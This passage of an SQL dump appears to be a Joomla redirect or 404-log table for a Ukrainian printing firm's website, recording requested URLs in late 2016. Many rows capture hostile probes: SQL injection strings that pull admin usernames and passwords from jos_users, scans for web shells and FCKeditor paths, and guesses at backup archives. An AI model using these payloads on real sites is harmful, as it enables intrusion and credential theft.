00:00:00',301),(2389,'http://ekvatorprint.com.ua/libraries/library.php',NULL,'http://ekvatorprint.com.ua/libraries/library.php','',4,0,'2016-11-19 09:54:43','0000-00-00 00:00:00',301),(2390,'http://ekvatorprint.com.ua/includes/background.php',NULL,'http://ekvatorprint.com.ua/includes/background.php','',2,0,'2016-11-19 09:54:43','0000-00-00 00:00:00',301),(2391,'http://ekvatorprint.com.ua/jproicaptcha.php',NULL,'http://ekvatorprint.com.ua/jproicaptcha.php','',2,0,'2016-11-19 09:54:43','0000-00-00 00:00:00',301),(2392,'http://ekvatorprint.com.ua/media/widgetkit/widgets/map/sha1_file.php',NULL,'http://ekvatorprint.com.ua/media/widgetkit/widgets/map/sha1_file.php','',2,0,'2016-11-19 09:54:44','0000-00-00 00:00:00',301),(2393,'http://ekvatorprint.com.ua/logo_img.php',NULL,'http://ekvatorprint.com.ua/logo_img.php','',8,0,'2016-11-19 09:54:44','0000-00-00 00:00:00',301),(2394,'http://ekvatorprint.com.ua/Печать наклеек на виниле (пленке), самоклеющейся пленке (самоклейке) оракале - в Харькове. Доставка по всей Украине',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',2,0,'2016-11-20 01:29:06','0000-00-00 00:00:00',301),(2395,'http://ekvatorprint.com.ua/m/delivery',NULL,'','',1,0,'2016-11-20 14:38:49','0000-00-00 00:00:00',301),(2396,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/task.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/task.php','',2,0,'2016-11-21 00:27:39','0000-00-00 00:00:00',301),(2397,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/mon.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/mon.php','',2,0,'2016-11-21 00:27:39','0000-00-00 00:00:00',301),(2398,'http://ekvatorprint.com.ua/administrator/default.php',NULL,'http://ekvatorprint.com.ua/administrator/default.php','',1,0,'2016-11-21 00:27:40','0000-00-00 00:00:00',301),(2399,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/models/cache_41.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/models/cache_41.php','',1,0,'2016-11-21 00:27:40','0000-00-00 00:00:00',301),(2400,'http://ekvatorprint.com.ua/components/com_content/helpers/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_content/helpers/backup.php','',1,0,'2016-11-21 00:27:54','0000-00-00 00:00:00',301),(2401,'http://ekvatorprint.com.ua/images/httplogs.php',NULL,'http://ekvatorprint.com.ua/images/httplogs.php','',1,0,'2016-11-21 00:28:08','0000-00-00 00:00:00',301),(2402,'http://ekvatorprint.com.ua/images/error-logs.php',NULL,'http://ekvatorprint.com.ua/images/error-logs.php','',1,0,'2016-11-21 00:28:08','0000-00-00 00:00:00',301),(2403,'http://ekvatorprint.com.ua/images/erorrs.php',NULL,'http://ekvatorprint.com.ua/images/erorrs.php','',1,0,'2016-11-21 00:28:09','0000-00-00 00:00:00',301),(2404,'http://ekvatorprint.com.ua/libraries/cms/language/con.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/language/con.php','',2,0,'2016-11-21 00:28:26','0000-00-00 00:00:00',301),(2405,'http://ekvatorprint.com.ua/modules/joommod/joommod.php',NULL,'http://ekvatorprint.com.ua/modules/joommod/joommod.php','',1,0,'2016-11-21 00:29:26','0000-00-00 00:00:00',301),(2406,'http://ekvatorprint.com.ua/modules/cgi.php',NULL,'http://ekvatorprint.com.ua/modules/cgi.php','',1,0,'2016-11-21 00:29:27','0000-00-00 00:00:00',301),(2407,'http://ekvatorprint.com.ua/mod_ariimageslidersa.php',NULL,'http://ekvatorprint.com.ua/mod_ariimageslidersa.php','',4,0,'2016-11-21 00:29:27','0000-00-00 00:00:00',301),(2408,'http://ekvatorprint.com.ua/media/jui/js/cache_46.php',NULL,'http://ekvatorprint.com.ua/media/jui/js/cache_46.php','',1,0,'2016-11-21 00:29:27','0000-00-00 00:00:00',301),(2409,'http://ekvatorprint.com.ua/modules/mod_accordion/elements/page.php',NULL,'http://ekvatorprint.com.ua/modules/mod_accordion/elements/page.php','',1,0,'2016-11-21 00:29:27','0000-00-00 00:00:00',301),(2410,'http://ekvatorprint.com.ua/modules/jooml.php',NULL,'http://ekvatorprint.com.ua/modules/jooml.php','',1,0,'2016-11-21 00:29:28','0000-00-00 00:00:00',301),(2411,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/ini.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/ini.php','',1,0,'2016-11-21 00:29:38','0000-00-00 00:00:00',301),(2412,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php.suspected','',4,0,'2016-11-21 00:29:52','0000-00-00 00:00:00',301),(2413,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/styles.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/styles.php','',3,0,'2016-11-21 00:30:31','0000-00-00 00:00:00',301),(2414,'http://ekvatorprint.com.ua/modules/mod_image_show_gk4/language/conf_46.php',NULL,'http://ekvatorprint.com.ua/modules/mod_image_show_gk4/language/conf_46.php','',2,0,'2016-11-21 00:30:32','0000-00-00 00:00:00',301),(2415,'http://ekvatorprint.com.ua/modules/mod_google/mod_msn_show.php',NULL,'http://ekvatorprint.com.ua/modules/mod_google/mod_msn_show.php','',2,0,'2016-11-21 00:30:33','0000-00-00 00:00:00',301),(2416,'http://ekvatorprint.com.ua/modules/mod_modules/mod_modules.php',NULL,'http://ekvatorprint.com.ua/modules/mod_modules/mod_modules.php','',4,0,'2016-11-21 00:31:20','0000-00-00 00:00:00',301),(2417,'http://ekvatorprint.com.ua/modules/mod_mysqlw/mod_mysqlw.php',NULL,'http://ekvatorprint.com.ua/modules/mod_mysqlw/mod_mysqlw.php','',6,0,'2016-11-21 00:31:20','0000-00-00 00:00:00',301),(2418,'http://ekvatorprint.com.ua/modules/mod_speedup/mod_speedup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_speedup/mod_speedup.php','',2,0,'2016-11-21 00:31:21','0000-00-00 00:00:00',301),(2419,'http://ekvatorprint.com.ua/modules/mod_widget/mod_widget.php',NULL,'http://ekvatorprint.com.ua/modules/mod_widget/mod_widget.php','',7,0,'2016-11-21 00:31:35','0000-00-00 00:00:00',301),(2420,'http://ekvatorprint.com.ua/plugins/system/anticopy/system.php',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy/system.php','',2,0,'2016-11-21 00:31:51','0000-00-00 00:00:00',301),(2421,'http://ekvatorprint.com.ua/plugins/search/example.php',NULL,'http://ekvatorprint.com.ua/plugins/search/example.php','',2,0,'2016-11-21 00:31:51','0000-00-00 00:00:00',301),(2422,'http://ekvatorprint.com.ua/templates/atomic/ajax.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/ajax.php','',2,0,'2016-11-21 00:32:05','0000-00-00 00:00:00',301),(2423,'http://ekvatorprint.com.ua/stopgloal.php',NULL,'http://ekvatorprint.com.ua/stopgloal.php','',2,0,'2016-11-21 00:32:05','0000-00-00 00:00:00',301),(2424,'http://ekvatorprint.com.ua/sitemaps.php',NULL,'http://ekvatorprint.com.ua/sitemaps.php','',2,0,'2016-11-21 00:32:05','0000-00-00 00:00:00',301),(2425,'http://ekvatorprint.com.ua/templates/atomic/js/stream_socket_get_name.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/js/stream_socket_get_name.php','',2,0,'2016-11-21 00:32:06','0000-00-00 00:00:00',301),(2426,'http://ekvatorprint.com.ua/templates/beez/components.php',NULL,'http://ekvatorprint.com.ua/templates/beez/components.php','',2,0,'2016-11-21 00:32:20','0000-00-00 00:00:00',301),(2427,'http://ekvatorprint.com.ua/templates/beez5/info.php',NULL,'http://ekvatorprint.com.ua/templates/beez5/info.php','',2,0,'2016-11-21 00:32:20','0000-00-00 00:00:00',301),(2428,'http://ekvatorprint.com.ua/templates/protostar/css/iqpivr.php',NULL,'http://ekvatorprint.com.ua/templates/protostar/css/iqpivr.php','',1,0,'2016-11-21 00:32:20','0000-00-00 00:00:00',301),(2429,'http://ekvatorprint.com.ua/templates/beez/carte.php',NULL,'http://ekvatorprint.com.ua/templates/beez/carte.php','',2,0,'2016-11-21 00:32:21','0000-00-00 00:00:00',301),(2430,'http://ekvatorprint.com.ua/templates/atomic/wp-ajax.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/wp-ajax.php','',2,0,'2016-11-21 00:32:21','0000-00-00 00:00:00',301),(2431,'http://ekvatorprint.com.ua/tmp/logo_img.php',NULL,'http://ekvatorprint.com.ua/tmp/logo_img.php','',10,0,'2016-11-21 00:32:36','0000-00-00 00:00:00',301),(2432,'http://ekvatorprint.com.ua/tmp/jquery.php',NULL,'http://ekvatorprint.com.ua/tmp/jquery.php','',1,0,'2016-11-21 00:32:37','0000-00-00 00:00:00',301),(2433,'http://ekvatorprint.com.ua/wp-includes/js/system.php',NULL,'http://ekvatorprint.com.ua/wp-includes/js/system.php','',1,0,'2016-11-21 00:33:49','0000-00-00 00:00:00',301),(2434,'http://ekvatorprint.com.ua/wp-includes/pomo/system.php',NULL,'http://ekvatorprint.com.ua/wp-includes/pomo/system.php','',2,0,'2016-11-21 00:33:49','0000-00-00 00:00:00',301),(2435,'http://ekvatorprint.com.ua/wp-single.php',NULL,'http://ekvatorprint.com.ua/wp-single.php','',1,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2436,'http://ekvatorprint.com.ua/wp-includes/images/system.php',NULL,'http://ekvatorprint.com.ua/wp-includes/images/system.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2437,'http://ekvatorprint.com.ua/wp-includes/certificates/system.php',NULL,'http://ekvatorprint.com.ua/wp-includes/certificates/system.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2438,'http://ekvatorprint.com.ua/wp-includes/css/system.php',NULL,'http://ekvatorprint.com.ua/wp-includes/css/system.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2439,'http://ekvatorprint.com.ua/wp-includes/core.php',NULL,'http://ekvatorprint.com.ua/wp-includes/core.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2440,'http://ekvatorprint.com.ua/wp-admin/network/system.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/system.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2441,'http://ekvatorprint.com.ua/wp-content/languages/themes/sys.php',NULL,'http://ekvatorprint.com.ua/wp-content/languages/themes/sys.php','',1,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2442,'http://ekvatorprint.com.ua/wp-admin/user/system.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/system.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2443,'http://ekvatorprint.com.ua/wp-content/uploads/system.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/system.php','',2,0,'2016-11-21 00:33:50','0000-00-00 00:00:00',301),(2444,'http://ekvatorprint.com.ua/banner-printin',NULL,'','',1,0,'2016-11-23 11:18:24','0000-00-00 00:00:00',301),(2445,'http://ekvatorprint.com.ua/index.php?option=com_youtubegallery&view=youtubegallery&listid=-1+union+select+1,1,1,1,1,1,1&themeid=1',NULL,'','',2,0,'2016-11-23 13:22:46','0000-00-00 00:00:00',301),(2446,'http://ekvatorprint.com.ua/plotternaya-podrezka/plotternaya-podrezka',NULL,'','',1,0,'2016-11-23 21:17:49','0000-00-00 00:00:00',301),(2447,'http://ekvatorprint.com.ua/plotternaya-podrezka/modulnye-kartiny',NULL,'','',1,0,'2016-11-23 21:34:28','0000-00-00 00:00:00',301),(2448,'http://ekvatorprint.com.ua/printing-on-an-awning/plotternaya-podrezka',NULL,'','',1,0,'2016-11-23 22:02:08','0000-00-00 00:00:00',301),(2449,'http://ekvatorprint.com.ua/print-citylights/plotternaya-podrezka',NULL,'','',1,0,'2016-11-23 22:16:46','0000-00-00 00:00:00',301),(2450,'http://ekvatorprint.com.ua/print-photo/outdoor-advertising',NULL,'','',1,0,'2016-11-24 02:30:02','0000-00-00 00:00:00',301),(2451,'http://ekvatorprint.com.ua/print-photo/plotternaya-podrezka',NULL,'','',1,0,'2016-11-24 02:48:45','0000-00-00 00:00:00',301),(2452,'http://ekvatorprint.com.ua/print-photo/modulnye-kartiny',NULL,'','',1,0,'2016-11-24 03:18:30','0000-00-00 00:00:00',301),(2453,'http://ekvatorprint.com.ua/print-photo/printing-on-an-awning',NULL,'','',1,0,'2016-11-24 03:52:59','0000-00-00 00:00:00',301),(2454,'http://ekvatorprint.com.ua/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=24+limit+0,1--+a',NULL,'','',2,0,'2016-11-24 04:09:07','0000-00-00 00:00:00',301),(2455,'http://ekvatorprint.com.ua/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=25+limit+0,1--+a',NULL,'','',2,0,'2016-11-24 04:09:10','0000-00-00 00:00:00',301),(2456,'http://ekvatorprint.com.ua/print-photo/print-citylights',NULL,'','',1,0,'2016-11-24 04:39:06','0000-00-00 00:00:00',301),(2457,'http://ekvatorprint.com.ua/print-photo/print-flags',NULL,'','',1,0,'2016-11-24 05:20:10','0000-00-00 00:00:00',301),(2458,'http://ekvatorprint.com.ua/print-photo/print-photo',NULL,'','',1,0,'2016-11-24 06:02:45','0000-00-00 00:00:00',301),(2459,'http://ekvatorprint.com.ua/com123.rar',NULL,'','',1,0,'2016-11-24 21:53:01','0000-00-00 00:00:00',301),(2460,'http://ekvatorprint.com.ua/com123456.rar',NULL,'','',1,0,'2016-11-24 21:53:04','0000-00-00 00:00:00',301),(2461,'http://ekvatorprint.com.ua/comcom.rar',NULL,'','',1,0,'2016-11-24 21:53:04','0000-00-00 00:00:00',301),(2462,'http://ekvatorprint.com.ua/com.com.rar',NULL,'','',1,0,'2016-11-24 21:53:05','0000-00-00 00:00:00',301),(2463,'http://ekvatorprint.com.ua/com.cn.rar',NULL,'','',1,0,'2016-11-24 21:53:05','0000-00-00 00:00:00',301),(2464,'http://ekvatorprint.com.ua/com.net.rar',NULL,'','',1,0,'2016-11-24 21:53:06','0000-00-00 00:00:00',301),(2465,'http://ekvatorprint.com.ua/www.com.com.rar',NULL,'','',1,0,'2016-11-24 21:53:06','0000-00-00 00:00:00',301),(2466,'http://ekvatorprint.com.ua/www.com.cn.rar',NULL,'','',1,0,'2016-11-24 21:53:07','0000-00-00 00:00:00',301),(2467,'http://ekvatorprint.com.ua/www.com.net.rar',NULL,'','',1,0,'2016-11-24 21:53:07','0000-00-00 00:00:00',301),(2468,'http://ekvatorprint.com.ua/com111.rar',NULL,'','',1,0,'2016-11-24 21:53:09','0000-00-00 00:00:00',301),(2469,'http://ekvatorprint.com.ua/com12345678.rar',NULL,'','',1,0,'2016-11-24 21:53:10','0000-00-00 00:00:00',301),(2470,'http://ekvatorprint.com.ua/com123456789.rar',NULL,'','',1,0,'2016-11-24 21:53:10','0000-00-00 00:00:00',301),(2471,'http://ekvatorprint.com.ua/com2014.rar',NULL,'','',1,0,'2016-11-24 21:53:10','0000-00-00 00:00:00',301),(2472,'http://ekvatorprint.com.ua/com2015.rar',NULL,'','',1,0,'2016-11-24 21:53:11','0000-00-00 00:00:00',301),(2473,'http://ekvatorprint.com.ua/com2020.rar',NULL,'','',1,0,'2016-11-24 21:53:12','0000-00-00 00:00:00',301),(2474,'http://ekvatorprint.com.ua/com2016.rar',NULL,'','',1,0,'2016-11-24 21:53:13','0000-00-00 00:00:00',301),(2475,'http://ekvatorprint.com.ua/mobile/delivery',NULL,'','',1,0,'2016-11-26 00:38:46','0000-00-00 00:00:00',301),(2476,'http://ekvatorprint.com.ua/rabota',NULL,'','',13,0,'2016-11-26 14:55:14','0000-00-00 00:00:00',301),(2477,'http://ekvatorprint.com.ua/2016-11-26-15-07-22',NULL,'','',1,0,'2016-11-26 15:09:53','0000-00-00 00:00:00',301),(2478,'http://ekvatorprint.com.ua/rabota.css',NULL,'http://ekvatorprint.com.ua/rabota','',9,0,'2016-11-26 16:06:02','0000-00-00 00:00:00',301),(2479,'http://ekvatorprint.com.ua/ekvatorprint.com.ua/printing-on-canvas',NULL,'','',12,0,'2016-11-26 16:34:10','0000-00-00 00:00:00',301),(2480,'http://ekvatorprint.com.ua/?view=registration',NULL,'','',68,0,'2016-11-27 09:53:31','0000-00-00 00:00:00',301),(2481,'http://ekvatorprint.com.ua/?view=registration&id=4',NULL,'','',838,0,'2016-11-27 09:53:31','0000-00-00 00:00:00',301),(2482,'http://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=24+limit+0,1--+;',NULL,'','',2,0,'2016-11-29 08:19:21','0000-00-00 00:00:00',301),(2483,'http://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=25+limit+0,1--+;',NULL,'','',2,0,'2016-11-29 08:19:23','0000-00-00 00:00:00',301),(2484,'http://ekvatorprint.com.ua/index.php?option=com_subcategory&id=20+UNION+SELECT+md5(3.1415)--',NULL,'','',1,0,'2016-11-29 10:06:06','0000-00-00 00:00:00',301),(2485,'http://ekvatorprint.com.ua/index.php?option=com_contactformmaker&view=contactformmaker&id=1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(3.1415),FLOOR (RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--+',NULL,'','',1,0,'2016-11-29 10:06:06','0000-00-00 00:00:00',301),(2486,'http://ekvatorprint.com.ua/index.php?option=com_hotproperty&task=asearch&Item id=27&search_id=2&Itemid=\'',NULL,'','',1,0,'2016-11-29 10:06:06','0000-00-00 00:00:00',301),(2487,'http://ekvatorprint.com.ua/index.php?option=com_jomestate&task=print&id=MD5(3.1415)&cid=9&print=',NULL,'','',1,0,'2016-11-29 10:06:06','0000-00-00 00:00:00',301),(2488,'http://ekvatorprint.com.ua/index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=24+limit+0,1--+a',NULL,'','',1,0,'2016-11-29 17:50:20','0000-00-00 00:00:00',301),(2489,'http://ekvatorprint.com.ua/index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=25+limit+0,1--+a',NULL,'','',1,0,'2016-11-29 17:50:22','0000-00-00 00:00:00',301),(2490,'http://ekvatorprint.com.ua/?view=videos&type=member&user_id=1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from+jos_users+where+gid=25+limit+0,1--&option=com_jomtube',NULL,'','',1,0,'2016-11-30 01:43:59','0000-00-00 00:00:00',301),(2491,'http://ekvatorprint.com.ua/images/jmail.php?u',NULL,'','',2,0,'2016-11-30 06:31:52','0000-00-00 00:00:00',301),(2492,'http://ekvatorprint.com.ua/libraries/joomla/jmail.php?u',NULL,'','',2,0,'2016-11-30 06:31:59','0000-00-00 00:00:00',301),(2493,'http://ekvatorprint.com.ua/ekvatorprint.com.ua/printing-on-vinyl',NULL,'','',6,0,'2016-11-30 08:56:33','0000-00-00 00:00:00',301),(2494,'http://ekvatorprint.com.ua/contactsпечать на металической пластине',NULL,'','',1,0,'2016-11-30 10:29:23','0000-00-00 00:00:00',301),(2495,'http://ekvatorprint.com.ua/wp-smtp.php?c',NULL,'','',1,0,'2016-12-01 08:41:12','0000-00-00 00:00:00',301),(2496,'http://ekvatorprint.com.ua/адрес_из_конструктора',NULL,'http://ekvatorprint.com.ua/contacts','',1,0,'2016-12-01 15:04:52','0000-00-00 00:00:00',301),(2497,'http://ekvatorprint.com.ua/banner-printing.html',NULL,'','',1,0,'2016-12-02 08:23:49','0000-00-00 00:00:00',301),(2498,'http://ekvatorprint.com.ua/delivery.html',NULL,'','',1,0,'2016-12-02 08:24:09','0000-00-00 00:00:00',301),(2499,'http://ekvatorprint.com.ua/modulnye-kartiny.html',NULL,'','',1,0,'2016-12-02 08:25:05','0000-00-00 00:00:00',301),(2500,'http://ekvatorprint.com.ua/plotternaya-podrezka.html',NULL,'','',1,0,'2016-12-02 08:28:18','0000-00-00 00:00:00',301),(2501,'http://ekvatorprint.com.ua/price.html',NULL,'','',1,0,'2016-12-02 08:28:39','0000-00-00 00:00:00',301),(2502,'http://ekvatorprint.com.ua/print-billboards.html',NULL,'','',1,0,'2016-12-02 08:28:51','0000-00-00 00:00:00',301),(2503,'http://ekvatorprint.com.ua/print-citylights.html',NULL,'','',1,0,'2016-12-02 08:29:02','0000-00-00 00:00:00',301),(2504,'http://ekvatorprint.com.ua/print-flags.html',NULL,'','',1,0,'2016-12-02 08:29:32','0000-00-00 00:00:00',301),(2505,'http://ekvatorprint.com.ua/print-great-photos.html',NULL,'','',1,0,'2016-12-02 08:29:53','0000-00-00 00:00:00',301),(2506,'http://ekvatorprint.com.ua/print-photo.html',NULL,'','',1,0,'2016-12-02 08:30:01','0000-00-00 00:00:00',301),(2507,'http://ekvatorprint.com.ua/printing-on-an-awning.html',NULL,'','',1,0,'2016-12-02 08:30:30','0000-00-00 00:00:00',301),(2508,'http://ekvatorprint.com.ua/printing-on-the-grid.html',NULL,'','',1,0,'2016-12-02 08:30:49','0000-00-00 00:00:00',301),(2509,'http://ekvatorprint.com.ua/printing-on-vinyl.html',NULL,'','',1,0,'2016-12-02 08:30:58','0000-00-00 00:00:00',301),(2510,'http://ekvatorprint.com.ua/trebovaniya.html',NULL,'','',1,0,'2016-12-02 08:31:05','0000-00-00 00:00:00',301),(2511,'http://ekvatorprint.com.ua/video.html',NULL,'','',1,0,'2016-12-02 08:31:12','0000-00-00 00:00:00',301),(2512,'http://ekvatorprint.com.ua/printing-in-kyiv/banner-printing',NULL,'','',1,0,'2016-12-02 08:40:19','0000-00-00 00:00:00',301),(2513,'http://ekvatorprint.com.ua/printing-in-kyiv/modulnye-kartiny',NULL,'','',1,0,'2016-12-02 08:43:43','0000-00-00 00:00:00',301),(2514,'http://ekvatorprint.com.ua/printing-in-odessa/banner-printing',NULL,'','',1,0,'2016-12-02 08:44:07','0000-00-00 00:00:00',301),(2515,'http://ekvatorprint.com.ua/printing-in-odessa/modulnye-kartiny',NULL,'','',1,0,'2016-12-02 08:48:18','0000-00-00 00:00:00',301),(2516,'http://ekvatorprint.com.ua/printing-in-zaporozhje/banner-printing',NULL,'','',1,0,'2016-12-02 08:48:38','0000-00-00 00:00:00',301),(2517,'http://ekvatorprint.com.ua/printing-in-zaporozhje/modulnye-kartiny',NULL,'','',1,0,'2016-12-02 08:52:29','0000-00-00 00:00:00',301),(2518,'http://ekvatorprint.com.ua/FCKeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:49','0000-00-00 00:00:00',301),(2519,'http://ekvatorprint.com.ua/outils/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:49','0000-00-00 00:00:00',301),(2520,'http://ekvatorprint.com.ua/javascript/editors/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:50','0000-00-00 00:00:00',301),(2521,'http://ekvatorprint.com.ua/administartors/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:50','0000-00-00 00:00:00',301),(2522,'http://ekvatorprint.com.ua/lib/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:50','0000-00-00 00:00:00',301),(2523,'http://ekvatorprint.com.ua/scripts/FCKeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:50','0000-00-00 00:00:00',301),(2524,'http://ekvatorprint.com.ua/sysadmin/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:50','0000-00-00 00:00:00',301),(2525,'http://ekvatorprint.com.ua/manage/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:50','0000-00-00 00:00:00',301),(2526,'http://ekvatorprint.com.ua/js/editor/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2527,'http://ekvatorprint.com.ua/scripts/editor/editor/',NULL,'','',2,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2528,'http://ekvatorprint.com.ua/js/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2529,'http://ekvatorprint.com.ua/sysadmin/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2530,'http://ekvatorprint.com.ua/admin/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2531,'http://ekvatorprint.com.ua/administartor/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2532,'http://ekvatorprint.com.ua/support/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:51','0000-00-00 00:00:00',301),(2533,'http://ekvatorprint.com.ua/inc/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:52','0000-00-00 00:00:00',301),(2534,'http://ekvatorprint.com.ua/Fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:52','0000-00-00 00:00:00',301),(2535,'http://ekvatorprint.com.ua/fck/editor/',NULL,'','',1,0,'2016-12-03 05:57:52','0000-00-00 00:00:00',301),(2536,'http://ekvatorprint.com.ua/system/editor/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:52','0000-00-00 00:00:00',301),(2537,'http://ekvatorprint.com.ua/editorold/editor/',NULL,'','',1,0,'2016-12-03 05:57:52','0000-00-00 00:00:00',301),(2538,'http://ekvatorprint.com.ua/js/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:52','0000-00-00 00:00:00',301),(2539,'http://ekvatorprint.com.ua/lib/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2540,'http://ekvatorprint.com.ua/editor1/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2541,'http://ekvatorprint.com.ua/library/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2542,'http://ekvatorprint.com.ua/library/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2543,'http://ekvatorprint.com.ua/outils/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2544,'http://ekvatorprint.com.ua/plugins/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2545,'http://ekvatorprint.com.ua/ckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2546,'http://ekvatorprint.com.ua/include/editors/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2547,'http://ekvatorprint.com.ua/Fckeditornew/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2548,'http://ekvatorprint.com.ua/data/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:53','0000-00-00 00:00:00',301),(2549,'http://ekvatorprint.com.ua/templates/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:56','0000-00-00 00:00:00',301),(2550,'http://ekvatorprint.com.ua/Fckeditorold/editor/',NULL,'','',1,0,'2016-12-03 05:57:57','0000-00-00 00:00:00',301),(2551,'http://ekvatorprint.com.ua/plugins/fckeditor/editor/',NULL,'','',1,0,'2016-12-03 05:57:58','0000-00-00 00:00:00',301),(2552,'http://ekvatorprint.com.ua/system/editor/editor/',NULL,'','',1,0,'2016-12-03 05:57:58','0000-00-00 00:00:00',301),(2553,'http://ekvatorprint.com.ua//images/stories/magic.php.png',NULL,'','',2,0,'2016-12-04 05:29:02','0000-00-00 00:00:00',301),(2554,'http://ekvatorprint.com.ua/wp-content/uploads/user_uploads/db.php',NULL,'','',1,0,'2016-12-05 12:22:12','0000-00-00 00:00:00',301),(2555,'http://ekvatorprint.com.ua/wp-admin/admin-post.php?task=wpmp_upload_previews',NULL,'','',3,0,'2016-12-05 12:22:13','0000-00-00 00:00:00',301),(2556,'http://ekvatorprint.com.ua/wp-content/uploads/wpmp-previews/db.php',NULL,'','',1,0,'2016-12-05 12:22:15','0000-00-00 00:00:00',301),(2557,'http://ekvatorprint.com.ua/templates/rhuk_milkyway/css/.css',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-12-05 12:37:29','0000-00-00 00:00:00',301),(2558,'http://ekvatorprint.com.ua/templates/rhuk_milkyway/css/_bg.css',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-12-05 12:37:30','0000-00-00 